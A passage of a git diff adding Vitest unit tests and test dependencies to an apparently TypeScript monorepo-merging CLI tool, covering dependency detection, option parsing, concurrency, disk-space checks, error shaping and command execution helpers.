name, + ...overrides, + }); + + it('should detect dependencies between packages', () => { + const packages = [ + createPackageInfo('core', { dependencies: {} }), + createPackageInfo('ui', { dependencies: { core: '^1.0.0' } }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps).toHaveLength(1); + expect(crossDeps[0]).toEqual({ + fromPackage: 'ui', + toPackage: 'core', + currentVersion: '^1.0.0', + dependencyType: 'dependencies', + }); + }); + + it('should detect devDependencies between packages', () => { + const packages = [ + createPackageInfo('test-utils'), + createPackageInfo('app', { devDependencies: { 'test-utils': '^1.0.0' } }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps).toHaveLength(1); + expect(crossDeps[0].dependencyType).toBe('devDependencies'); + }); + + it('should detect peerDependencies between packages', () => { + const packages = [ + createPackageInfo('react-core'), + createPackageInfo('react-plugin', { peerDependencies: { 'react-core': '>=1.0.0' } }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps).toHaveLength(1); + expect(crossDeps[0].dependencyType).toBe('peerDependencies'); + }); + + it('should return empty for no cross-dependencies', () => { + const packages = [ + createPackageInfo('a', { dependencies: { lodash: '^4.17.21' } }), + createPackageInfo('b', { dependencies: { express: '^4.18.0' } }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps).toEqual([]); + }); + + it('should detect multiple cross-dependencies', () => { + const packages = [ + createPackageInfo('core'), + createPackageInfo('utils'), + createPackageInfo('app', { + dependencies: { core: '^1.0.0', utils: '^1.0.0' }, + devDependencies: { core: '^1.0.0' }, + }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps.length).toBeGreaterThanOrEqual(3); + }); + + it('should handle empty packages array', () => { + expect(detectCrossDependencies([])).toEqual([]); + }); + }); + + describe('rewriteToWorkspaceProtocol', () => { + it('should rewrite cross-dep versions to workspace:*', () => { + const pkgJson: Record = { + name: 'app', + dependencies: { core: '^1.0.0', lodash: '^4.17.21' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'app', toPackage: 'core', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((result.dependencies as Record).core).toBe('workspace:*'); + expect((result.dependencies as Record).lodash).toBe('^4.17.21'); + }); + + it('should rewrite devDependencies', () => { + const pkgJson: Record = { + name: 'app', + devDependencies: { 'test-utils': '^1.0.0', vitest: '^2.0.0' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'app', toPackage: 'test-utils', currentVersion: '^1.0.0', dependencyType: 'devDependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((result.devDependencies as Record)['test-utils']).toBe('workspace:*'); + expect((result.devDependencies as Record).vitest).toBe('^2.0.0'); + }); + + it('should rewrite peerDependencies', () => { + const pkgJson: Record = { + name: 'plugin', + peerDependencies: { core: '>=1.0.0' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'plugin', toPackage: 'core', currentVersion: '>=1.0.0', dependencyType: 'peerDependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((result.peerDependencies as Record).core).toBe('workspace:*'); + }); + + it('should not modify already workspace: prefixed versions', () => { + const pkgJson: Record = { + name: 'app', + dependencies: { core: 'workspace:*' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'app', toPackage: 'core', currentVersion: 'workspace:*', dependencyType: 'dependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((result.dependencies as Record).core).toBe('workspace:*'); + }); + + it('should handle missing dependency sections gracefully', () => { + const pkgJson: Record = { name: 'empty' }; + const crossDeps: CrossDependency[] = []; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect(result.dependencies).toBeUndefined(); + expect(result.devDependencies).toBeUndefined(); + expect(result.peerDependencies).toBeUndefined(); + }); + + it('should not mutate the original package.json', () => { + const pkgJson: Record = { + name: 'app', + dependencies: { core: '^1.0.0' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'app', toPackage: 'core', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((pkgJson.dependencies as Record).core).toBe('^1.0.0'); + expect((result.dependencies as Record).core).toBe('workspace:*'); + }); + }); }); diff --git a/tests/unit/strategies/workspace-tools.test.ts b/tests/unit/strategies/workspace-tools.test.ts index ef33fe7..a9b77a0 100644 --- a/tests/unit/strategies/workspace-tools.test.ts +++ b/tests/unit/strategies/workspace-tools.test.ts @@ -5,8 +5,9 @@ import { generateWorkspaceToolConfig, getWorkspaceToolDependencies, updateScriptsForWorkspaceTool, + getWorkspaceToolRunCommand, } from '../../../src/strategies/workspace-tools.js'; -import type { PackageInfo } from '../../../src/types/index.js'; +import type { PackageInfo, PackageManagerConfig } from '../../../src/types/index.js'; const createMockPackage = ( name: string, @@ -233,4 +234,31 @@ describe('workspace-tools', () => { expect(updated.custom).toBe('custom-cmd'); }); }); + + describe('getWorkspaceToolRunCommand', () => { + it('should return turbo run for turbo', () => { + expect(getWorkspaceToolRunCommand('turbo')).toBe('turbo run'); + }); + + it('should return nx run-many for nx', () => { + expect(getWorkspaceToolRunCommand('nx')).toBe('nx run-many --target='); + }); + + it('should return pnpm -r for none without pmConfig', () => { + expect(getWorkspaceToolRunCommand('none')).toBe('pnpm -r'); + }); + + it('should use pmConfig runAllCommand for none when provided', () => { + const pmConfig: PackageManagerConfig = { + type: 'yarn', + installCommand: 'yarn install', + addCommand: 'yarn add', + runCommand: 'yarn', + runAllCommand: (script: string) => `yarn workspaces foreach run ${script}`, + execCommand: 'yarn', + }; + const result = getWorkspaceToolRunCommand('none', pmConfig); + expect(result).toBe('yarn workspaces foreach run'); + }); + }); }); diff --git a/tests/unit/utils/cli-options.test.ts b/tests/unit/utils/cli-options.test.ts new file mode 100644 index 0000000..de8a64b --- /dev/null +++ b/tests/unit/utils/cli-options.test.ts @@ -0,0 +1,69 @@ +import { describe, it, expect } from 'vitest'; +import { + parseConflictStrategy, + parseWorkspaceTool, + parseWorkflowStrategy, +} from '../../../src/utils/cli-options.js'; +import { tryParsePackageManagerType } from '../../../src/strategies/package-manager.js'; + +describe('cli option parsers', () => { + describe('parseConflictStrategy', () => { + it('parses valid conflict strategies', () => { + expect(parseConflictStrategy('highest')).toBe('highest'); + expect(parseConflictStrategy('lowest')).toBe('lowest'); + expect(parseConflictStrategy('prompt')).toBe('prompt'); + }); + + it('parses case-insensitively', () => { + expect(parseConflictStrategy('HIGHEST')).toBe('highest'); + }); + + it('returns null for invalid values', () => { + expect(parseConflictStrategy('random')).toBeNull(); + }); + }); + + describe('parseWorkspaceTool', () => { + it('parses valid workspace tools', () => { + expect(parseWorkspaceTool('turbo')).toBe('turbo'); + expect(parseWorkspaceTool('nx')).toBe('nx'); + expect(parseWorkspaceTool('none')).toBe('none'); + }); + + it('returns null for invalid values', () => { + expect(parseWorkspaceTool('bazel')).toBeNull(); + }); + }); + + describe('parseWorkflowStrategy', () => { + it('parses valid workflow strategies', () => { + expect(parseWorkflowStrategy('combine')).toBe('combine'); + expect(parseWorkflowStrategy('keep-first')).toBe('keep-first'); + expect(parseWorkflowStrategy('keep-last')).toBe('keep-last'); + expect(parseWorkflowStrategy('skip')).toBe('skip'); + }); + + it('returns null for invalid values', () => { + expect(parseWorkflowStrategy('merge-all')).toBeNull(); + }); + }); + + describe('tryParsePackageManagerType', () => { + it('parses valid package manager inputs', () => { + expect(tryParsePackageManagerType('pnpm')).toBe('pnpm'); + expect(tryParsePackageManagerType('yarn')).toBe('yarn'); + expect(tryParsePackageManagerType('yarn-berry')).toBe('yarn-berry'); + expect(tryParsePackageManagerType('npm')).toBe('npm'); + }); + + it('supports yarn berry aliases', () => { + expect(tryParsePackageManagerType('yarn2')).toBe('yarn-berry'); + expect(tryParsePackageManagerType('yarn3')).toBe('yarn-berry'); + expect(tryParsePackageManagerType('yarn4')).toBe('yarn-berry'); + }); + + it('returns null for invalid values', () => { + expect(tryParsePackageManagerType('bun')).toBeNull(); + }); + }); +}); diff --git a/tests/unit/utils/concurrency.test.ts b/tests/unit/utils/concurrency.test.ts new file mode 100755 index 0000000..b5b120a --- /dev/null +++ b/tests/unit/utils/concurrency.test.ts @@ -0,0 +1,97 @@ +import { describe, it, expect } from 'vitest'; +import { pMap } from '../../../src/utils/concurrency.js'; + +describe('pMap', () => { + it('should map items through an async function', async () => { + const items = [1, 2, 3, 4, 5]; + const results = await pMap(items, async (item) => item * 2); + expect(results).toEqual([2, 4, 6, 8, 10]); + }); + + it('should respect concurrency limit', async () => { + let running = 0; + let maxRunning = 0; + const concurrency = 2; + + const items = [1, 2, 3, 4, 5, 6]; + await pMap( + items, + async (item) => { + running++; + if (running > maxRunning) { + maxRunning = running; + } + // Simulate async work to allow concurrency to be observed + await new Promise((resolve) => setTimeout(resolve, 20)); + running--; + return item; + }, + concurrency, + ); + + expect(maxRunning).toBeLessThanOrEqual(concurrency); + expect(maxRunning).toBeGreaterThan(0); + }); + + it('should propagate errors', async () => { + const items = [1, 2, 3]; + await expect( + pMap(items, async (item) => { + if (item === 2) throw new Error('fail on 2'); + return item; + }), + ).rejects.toThrow('fail on 2'); + }); + + it('should handle empty array', async () => { + const results = await pMap([], async (item: number) => item * 2); + expect(results).toEqual([]); + }); + + it('should handle single item', async () => { + const results = await pMap([42], async (item) => item + 1); + expect(results).toEqual([43]); + }); + + it('should preserve order of results', async () => { + const items = [5, 4, 3, 2, 1]; + const results = await pMap( + items, + async (item) => { + // Items with smaller values finish faster, but order should be preserved + await new Promise((resolve) => setTimeout(resolve, item * 5)); + return item * 10; + }, + 3, + ); + expect(results).toEqual([50, 40, 30, 20, 10]); + }); + + it('should pass correct index to callback', async () => { + const items = ['a', 'b', 'c']; + const indices: number[] = []; + await pMap(items, async (_item, index) => { + indices.push(index); + return index; + }); + expect(indices.sort()).toEqual([0, 1, 2]); + }); + + it('should default concurrency to 4', async () => { + let running = 0; + let maxRunning = 0; + + const items = Array.from({ length: 10 }, (_, i) => i); + await pMap(items, async (item) => { + running++; + if (running > maxRunning) { + maxRunning = running; + } + await new Promise((resolve) => setTimeout(resolve, 20)); + running--; + return item; + }); + + expect(maxRunning).toBeLessThanOrEqual(4); + }); +}); diff --git a/tests/unit/utils/disk-mocked.test.ts b/tests/unit/utils/disk-mocked.test.ts new file mode 100644 index 0000000..b8f19af --- /dev/null +++ b/tests/unit/utils/disk-mocked.test.ts @@ -0,0 +1,111 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; + +// Mock child_process before importing the module under test +const mockExecFile = vi.fn(); +vi.mock('node:child_process', () => ({ + execFile: mockExecFile, +})); + +// Import after mocking +const { checkDiskSpace } = await import('../../../src/utils/disk.js'); + +describe('checkDiskSpace - mocked branches', () => { + const originalPlatform = process.platform; + + beforeEach(() => { + vi.clearAllMocks(); + // Default these tests to Unix branch; windows-specific cases override explicitly. + Object.defineProperty(process, 'platform', { value: 'linux', configurable: true }); + }); + + afterEach(() => { + Object.defineProperty(process, 'platform', { value: originalPlatform, configurable: true }); + }); + + it('should parse Unix df output correctly', async () => { + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { + stdout: + 'Filesystem 1K-blocks Used Available Use% Mounted on\n/dev/sda1 50000000 20000000 30000000 40% /\n', + }); + }, + ); + + const result = await checkDiskSpace('/tmp'); + expect(result.availableBytes).toBe(30000000 * 1024); + expect(result.sufficient).toBe(true); + }); + + it('should return insufficient when available < 500MB', async () => { + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { + stdout: + 'Filesystem 1K-blocks Used Available Use% Mounted on\n/dev/sda1 1000000 800000 200000 80% /\n', + }); + }, + ); + + const result = await checkDiskSpace('/tmp'); + // 200000 KB = 204800000 bytes < 500_000_000 + expect(result.availableBytes).toBe(200000 * 1024); + expect(result.sufficient).toBe(false); + }); + + it('should handle df output with only header (no data line)', async () => { + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { + stdout: 'Filesystem 1K-blocks Used Available Use% Mounted on\n', + }); + }, + ); + + const result = await checkDiskSpace('/tmp'); + expect(result.availableBytes).toBe(0); + expect(result.sufficient).toBe(false); + }); + + it('should return fallback on execFile error', async () => { + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: Error) => void) => { + cb(new Error('Command failed')); + }, + ); + + const result = await checkDiskSpace('/bad/path'); + expect(result.availableBytes).toBe(-1); + expect(result.sufficient).toBe(true); + }); + + it('should handle win32 platform with wmic output', async () => { + Object.defineProperty(process, 'platform', { value: 'win32', configurable: true }); + + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { stdout: '\r\nFreeSpace=50000000000\r\n\r\n' }); + }, + ); + + const result = await checkDiskSpace('C:\\Users'); + expect(result.availableBytes).toBe(50000000000); + expect(result.sufficient).toBe(true); + + }); + + it('should handle win32 platform with no match in wmic output', async () => { + Object.defineProperty(process, 'platform', { value: 'win32', configurable: true }); + + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { stdout: 'unexpected output\r\n' }); + }, + ); + + const result = await checkDiskSpace('C:\\Users'); + expect(result.availableBytes).toBe(0); + expect(result.sufficient).toBe(false); + + }); +}); diff --git a/tests/unit/utils/disk.test.ts b/tests/unit/utils/disk.test.ts new file mode 100755 index 0000000..e601e2c --- /dev/null +++ b/tests/unit/utils/disk.test.ts @@ -0,0 +1,56 @@ +import { describe, it, expect } from 'vitest'; +import os from 'node:os'; +import { checkDiskSpace } from '../../../src/utils/disk.js'; + +describe('checkDiskSpace', () => { + it('should return positive available bytes for home directory', async () => { + const result = await checkDiskSpace(os.homedir()); + expect(result.availableBytes).toBeTypeOf('number'); + expect(result.sufficient).toBeTypeOf('boolean'); + // Sufficient should correlate with having > 500MB + if (result.availableBytes > 500_000_000) { + expect(result.sufficient).toBe(true); + } + }); + + it('should handle root path', async () => { + const rootPath = process.platform === 'win32' ? 'C:\\' : '/'; + const result = await checkDiskSpace(rootPath); + expect(result.availableBytes).toBeTypeOf('number'); + expect(result.sufficient).toBeTypeOf('boolean'); + }); + + it('should return an object with expected shape', async () => { + const result = await checkDiskSpace('/tmp'); + expect(result).toHaveProperty('availableBytes'); + expect(result).toHaveProperty('sufficient'); + expect(typeof result.availableBytes).toBe('number'); + expect(typeof result.sufficient).toBe('boolean'); + }); + + it('should work with current directory', async () => { + const result = await checkDiskSpace(process.cwd()); + expect(result).toHaveProperty('availableBytes'); + expect(result).toHaveProperty('sufficient'); + // Some environments (especially Windows CI) may return -1 when disk probes are unavailable. + expect(result.availableBytes).toBeGreaterThanOrEqual(-1); + }); + + it('should not throw on invalid paths', async () => { + const result = await checkDiskSpace('/nonexistent/path/that/does/not/exist'); + // Should return fallback values rather than throwing + expect(result).toHaveProperty('availableBytes'); + expect(result).toHaveProperty('sufficient'); + }); + + it('should report sufficient when available bytes exceeds threshold', async () => { + const result = await checkDiskSpace('/tmp'); + expect(result.sufficient).toBeTypeOf('boolean'); + // Verify the logic: sufficient iff availableBytes > 500MB + if (result.availableBytes > 500_000_000) { + expect(result.sufficient).toBe(true); + } else if (result.availableBytes >= 0 && result.availableBytes <= 500_000_000) { + expect(result.sufficient).toBe(false); + } + }); +}); diff --git a/tests/unit/utils/errors.test.ts b/tests/unit/utils/errors.test.ts new file mode 100755 index 0000000..77ff100 --- /dev/null +++ b/tests/unit/utils/errors.test.ts @@ -0,0 +1,152 @@ +import { describe, it, expect } from 'vitest'; +import { ActionableError, CliExitError, shapeError } from '../../../src/utils/errors.js'; + +describe('CliExitError', () => { + it('should construct with default exit code 1', () => { + const error = new CliExitError(); + expect(error.exitCode).toBe(1); + expect(error.message).toBe('Process exiting with code 1'); + expect(error.name).toBe('CliExitError'); + }); + + it('should construct with custom exit code', () => { + const error = new CliExitError(2); + expect(error.exitCode).toBe(2); + expect(error.message).toBe('Process exiting with code 2'); + }); + + it('should be an instance of Error', () => { + const error = new CliExitError(); + expect(error).toBeInstanceOf(Error); + expect(error).toBeInstanceOf(CliExitError); + }); +}); + +describe('ActionableError', () => { + it('should construct with message and hint', () => { + const error = new ActionableError('Something failed', 'Try again'); + + expect(error.message).toBe('Something failed'); + expect(error.hint).toBe('Try again'); + expect(error.name).toBe('ActionableError'); + }); + + it('should be an instance of Error', () => { + const error = new ActionableError('test', 'hint'); + + expect(error).toBeInstanceOf(Error); + expect(error).toBeInstanceOf(ActionableError); + }); + + it('should have a stack trace', () => { + const error = new ActionableError('test', 'hint'); + + expect(error.stack).toBeDefined(); + expect(error.stack).toContain('ActionableError'); + }); +}); + +describe('shapeError', () => { + it('should return the same error if already ActionableError', () => { + const original = new ActionableError('original', 'original hint'); + const shaped = shapeError(original); + + expect(shaped).toBe(original); + expect(shaped.hint).toBe('original hint'); + }); + + it('should shape ENOENT errors with file hint', () => { + const err = new Error('ENOENT: no such file or directory'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.message).toBe('ENOENT: no such file or directory'); + expect(shaped.hint).toBe('Check that the file or directory exists'); + }); + + it('should shape EACCES errors with permission hint', () => { + const err = new Error('EACCES: permission denied'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe( + 'Check file permissions or try running with elevated privileges' + ); + }); + + it('should shape EPERM errors with permission hint', () => { + const err = new Error('EPERM: operation not permitted'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe( + 'Check file permissions or try running with elevated privileges' + ); + }); + + it('should shape git-related errors with git hint', () => { + const err = new Error('fatal: not a git repository'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe( + 'Ensure git is installed and the repository is valid' + ); + }); + + it('should shape ENOSPC errors with disk space hint', () => { + const err = new Error('ENOSPC: no space left on device'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe( + 'Insufficient disk space. Free up space and try again' + ); + }); + + it('should provide a generic hint for unknown errors', () => { + const err = new Error('Something completely unexpected happened'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe('Check the error details above and try again'); + }); + + it('should handle string errors', () => { + const shaped = shapeError('a string error'); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.message).toBe('a string error'); + expect(shaped.hint).toBe('Check the error details above and try again'); + }); + + it('should handle non-Error objects', () => { + const shaped = shapeError({ code: 'UNKNOWN' }); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.message).toBe('[object Object]'); + }); + + it('should handle null and undefined', () => { + const shapedNull = shapeError(null); + expect(shapedNull).toBeInstanceOf(ActionableError); + expect(shapedNull.message).toBe('null'); + + const shapedUndefined = shapeError(undefined); + expect(shapedUndefined).toBeInstanceOf(ActionableError); + expect(shapedUndefined.message).toBe('undefined'); + }); + + it('should handle number errors', () => { + const shaped = shapeError(42); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.message).toBe('42'); + }); + + it('should match ENOENT in string errors', () => { + const shaped = shapeError('ENOENT: file missing'); + + expect(shaped.hint).toBe('Check that the file or directory exists'); + }); +}); diff --git a/tests/unit/utils/exec.test.ts b/tests/unit/utils/exec.test.ts new file mode 100755 index 0000000..fe8d174 --- /dev/null +++ b/tests/unit/utils/exec.test.ts @@ -0,0 +1,85 @@ +import os from 'node:os'; +import path from 'node:path'; +import fs from 'node:fs/promises'; +import { describe, it, expect } from 'vitest'; +import { safeExecFile, commandExists } from '../../../src/utils/exec.js'; + +describe('safeExecFile', () => { + it('should execute a simple command', async () => { + const result = await safeExecFile(process.execPath, ['-e', 'process.stdout.write("hello")']); + expect(result.stdout).toBe('hello'); + }); + + it('should throw on non-existent command', async () => { + await expect( + safeExecFile('nonexistent-command-xyz', []), + ).rejects.toThrow(); + }); + + it('should respect timeout', async () => { + // Very short timeout for a long-running Node process + await expect( + safeExecFile(process.execPath, ['-e', 'setTimeout(() => {}, 10_000)'], { timeout: 100 }), + ).rejects.toThrow(); + }); + + it('should pass cwd option', async () => { + const cwd = os.tmpdir(); + const result = await safeExecFile( + process.execPath, + ['-e', 'process.stdout.write(process.cwd())'], + { cwd }, + ); + const [actualCwd, expectedCwd] = await Promise.all([ + fs.realpath(path.resolve(result.stdout.trim())), + fs.realpath(path.resolve(cwd)), + ]); + expect(actualCwd).toBe(expectedCwd); + }); + + it('should pass custom env variables', async () => { + const result = await safeExecFile(process.execPath, ['-e', 'process.stdout.write(process.env.MY_TEST_VAR || "")'], { + env: { MY_TEST_VAR: 'hello123' }, + }); + expect(result.stdout).toBe('hello123'); + }); + + it('should include stderr in thrown error', async () => { + try { + await safeExecFile(process.execPath, ['-e', 'console.error("intentional stderr"); process.exit(1)']); + expect.fail('should have thrown'); + } catch (err) { + const error = err as Error & { stderr?: string }; + expect(error.message).toContain(process.execPath); + expect(error.stderr).toContain('intentional stderr'); + } + }); + + it('should propagate error code and stderr/stdout from failed command', async () => { + try { + await safeExecFile(process.execPath, ['-e', 'console.error("boom"); process.exit(2)']); + expect.fail('should have thrown'); + } catch (err) { + const error = err as Error & { code?: string; stderr?: string; stdout?: string }; + expect(error.stderr).toBeDefined(); + expect(typeof error.stdout).toBe('string'); + } + }); + + it('should use maxBuffer option', async () => { + // Small maxBuffer should cause error for large output + await expect( + safeExecFile(process.execPath, ['-e', 'process.stdout.write("x".repeat(100_000))'], { maxBuffer: 10 }), + ).rejects.toThrow(); + }); +}); + +describe('commandExists', () => { + it('should return true for git', async () => { + expect(await commandExists('git')).toBe(true); + }); + + it('should return false for nonexistent command', async () => { + expect(await commandExists('nonexistent-command-xyz-123')).toBe(false); + }); +}); diff --git a/tests/unit/utils/progress.test.ts b/tests/unit/utils/progress.test.ts new file mode 100755 index 0000000..657d2e6 --- /dev/null +++ b/tests/unit/utils/progress.test.ts @@ -0,0 +1,149 @@ +import { describe, it, expect } from 'vitest'; +import { ProgressEmitter, createProgressEmitter } from '../../../src/utils/progress.js'; +import type { ProgressEvent } from '../../../src/utils/progress.js'; + +describe('ProgressEmitter', () => { + it('should emit progress events with correct data', () => { + const emitter = new ProgressEmitter(3); + const events: ProgressEvent[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + events.push(event); + }); + + emitter.tick('step 1'); + emitter.tick('step 2'); + + expect(events).toHaveLength(2); + expect(events[0]).toEqual({ + current: 1, + total: 3, + label: 'step 1', + percentage: 33, + }); + expect(events[1]).toEqual({ + current: 2, + total: 3, + label: 'step 2', + percentage: 67, + }); + }); + + it('should emit done event after all ticks', () => { + const emitter = new ProgressEmitter(2); + let doneEmitted = false; + + emitter.on('done', () => { + doneEmitted = true; + }); + + emitter.tick('first'); + expect(doneEmitted).toBe(false); + + emitter.tick('second'); + expect(doneEmitted).toBe(true); + }); + + it('should not emit done before all items are processed', () => { + const emitter = new ProgressEmitter(5); + let doneEmitted = false; + + emitter.on('done', () => { + doneEmitted = true; + }); + + emitter.tick('1'); + emitter.tick('2'); + emitter.tick('3'); + emitter.tick('4'); + expect(doneEmitted).toBe(false); + + emitter.tick('5'); + expect(doneEmitted).toBe(true); + }); + + it('should reset current progress', () => { + const emitter = new ProgressEmitter(3); + const events: ProgressEvent[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + events.push(event); + }); + + emitter.tick('before reset'); + expect(events[0].current).toBe(1); + + emitter.reset(); + emitter.tick('after reset'); + expect(events[1].current).toBe(1); + expect(events[1].total).toBe(3); + }); + + it('should reset with a new total', () => { + const emitter = new ProgressEmitter(3); + const events: ProgressEvent[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + events.push(event); + }); + + emitter.tick('before'); + emitter.reset(10); + emitter.tick('after'); + + expect(events[1].current).toBe(1); + expect(events[1].total).toBe(10); + expect(events[1].percentage).toBe(10); + }); + + it('should calculate percentage correctly', () => { + const emitter = new ProgressEmitter(4); + const percentages: number[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + percentages.push(event.percentage); + }); + + emitter.tick('1'); + emitter.tick('2'); + emitter.tick('3'); + emitter.tick('4'); + + expect(percentages).toEqual([25, 50, 75, 100]); + }); + + it('should round percentage to nearest integer', () => { + const emitter = new ProgressEmitter(3); + const percentages: number[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + percentages.push(event.percentage); + }); + + emitter.tick('1'); // 1/3 = 33.33... -> 33 + emitter.tick('2'); // 2/3 = 66.66... -> 67 + emitter.tick('3'); // 3/3 = 100 + + expect(percentages).toEqual([33, 67, 100]); + }); +}); + +describe('createProgressEmitter', () => { + it('should create a ProgressEmitter instance', () => { + const emitter = createProgressEmitter(5); + expect(emitter).toBeInstanceOf(ProgressEmitter); + }); + + it('should create a functional emitter', () => { + const emitter = createProgressEmitter(2); + const events: ProgressEvent[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + events.push(event); + }); + + emitter.tick('item'); + expect(events).toHaveLength(1); + expect(events[0].total).toBe(2); + }); +}); diff --git a/tests/unit/utils/validation.edge-cases.test.ts b/tests/unit/utils/validation.edge-cases.test.ts index 3f5af6f..85c6ab4 100644 --- a/tests/unit/utils/validation.edge-cases.test.ts +++ b/tests/unit/utils/validation.edge-cases.test.ts @@ -164,9 +164,10 @@ describe('Validation Edge Cases', () => { describe('absolute vs relative paths', () => { it('should handle absolute path', () => { - const result = parseRepoSource('/Users/test/projects/repo'); + const absoluteInput = '/Users/test/projects/repo'; + const result = parseRepoSource(absoluteInput); expect(result.type).toBe('local'); - expect(result.resolved).toBe('/Users/test/projects/repo'); + expect(result.resolved).toBe(path.resolve(absoluteInput)); }); it('should resolve relative path starting with ./', () => { @@ -406,4 +407,40 @@ describe('Validation Edge Cases', () => { expect(sanitizePackageName('a!!!b')).toBe('a---b'); }); }); + + describe('checkPrerequisites edge cases', () => { + it('should check yarn-berry as yarn command', async () => { + const { checkPrerequisites } = await import('../../../src/utils/validation.js'); + const result = await checkPrerequisites({ + outputDir: '/tmp', + packageManager: 'yarn-berry', + }); + expect(result).toBeDefined(); + // yarn-berry maps to checking 'yarn' command + expect(typeof result.valid).toBe('boolean'); + }); + + it('should check npm as package manager', async () => { + const { checkPrerequisites } = await import('../../../src/utils/validation.js'); + const result = await checkPrerequisites({ + outputDir: '/tmp', + packageManager: 'npm', + }); + expect(result).toBeDefined(); + // npm should be installed since Node.js is installed + const npmErrors = result.errors.filter((e) => e.includes('npm')); + expect(npmErrors).toHaveLength(0); + }); + + it('should check non-existent output dir parent writability', async () => { + const { checkPrerequisites } = await import('../../../src/utils/validation.js'); + const result = await checkPrerequisites({ + outputDir: '/tmp/nonexistent-monotize-test/deep/path', + }); + expect(result).toBeDefined(); + // Parent doesn't exist, should error about writability + const writeErrors = result.errors.filter((e) => e.includes('writable')); + expect(writeErrors.length).toBeGreaterThanOrEqual(1); + }); + }); }); diff --git a/tests/utils/validation.test.ts b/tests/utils/validation.test.ts index 5113cae..650ba18 100644 --- a/tests/utils/validation.test.ts +++ b/tests/utils/validation.test.ts @@ -1,3 +1,4 @@ +import path from 'node:path'; import { describe, it, expect } from 'vitest'; import { parseRepoSource, validateRepoSources, isValidPackageName, sanitizePackageName } from '../../src/utils/validation.js'; @@ -38,10 +39,11 @@ describe('parseRepoSource', () => { }); it('should parse absolute local paths', () => { - const result = parseRepoSource('/Users/test/my-repo'); + const absoluteInput = '/Users/test/my-repo'; + const result = parseRepoSource(absoluteInput); expect(result.type).toBe('local'); expect(result.name).toBe('my-repo'); - expect(result.resolved).toBe('/Users/test/my-repo'); + expect(result.resolved).toBe(path.resolve(absoluteInput)); }); it('should handle repos with .git suffix', () => { diff --git a/ui/package.json b/ui/package.json index 0dce6eb..e9e4e3e 100755 --- a/ui/package.json +++ b/ui/package.json @@ -6,17 +6,23 @@ "scripts": { "dev": "vite --port 5173", "build": "vite build", - "preview": "vite preview" + "preview": "vite preview", + "test": "vitest run", + "test:watch": "vitest" }, "dependencies": { "react": "^19.0.0", "react-dom": "^19.0.0" }, "devDependencies": { + "@testing-library/jest-dom": "^6.9.1", + "@testing-library/react": "^16.3.2", "@types/react": "^19.0.0", "@types/react-dom": "^19.0.0", "@vitejs/plugin-react": "^4.0.0", + "jsdom": "^28.1.0", "typescript": "^5.3.0", - "vite": "^6.0.0" + "vite": "^6.0.0", + "vitest": "^4.0.18" } } diff --git a/ui/pnpm-lock.yaml b/ui/pnpm-lock.yaml index c9e4791..25fb503 100755 --- a/ui/pnpm-lock.yaml +++ b/ui/pnpm-lock.yaml @@ -15,6 +15,12 @@ importers: specifier: ^19.0.0 version: 19.2.4(react@19.2.4) devDependencies: + '@testing-library/jest-dom': + specifier: ^6.9.1 + version: 6.9.1 + '@testing-library/react': + specifier: ^16.3.2 + version: 16.3.2(@testing-library/dom@10.4.1)(@types/react-dom@19.2.3(@types/react@19.2.14))(@types/react@19.2.14)(react-dom@19.2.4(react@19.2.4))(react@19.2.4) '@types/react': specifier: ^19.0.0 version: 19.2.14 @@ -24,15 +30,37 @@ importers: '@vitejs/plugin-react': specifier: ^4.0.0 version: 4.7.0(vite@6.4.1) + jsdom: + specifier: ^28.1.0 + version: 28.1.0 typescript: specifier: ^5.3.0 version: 5.9.3 vite: specifier: ^6.0.0 version: 6.4.1 + vitest: + specifier: ^4.0.18 + version: 4.0.18(jsdom@28.1.0) packages: + 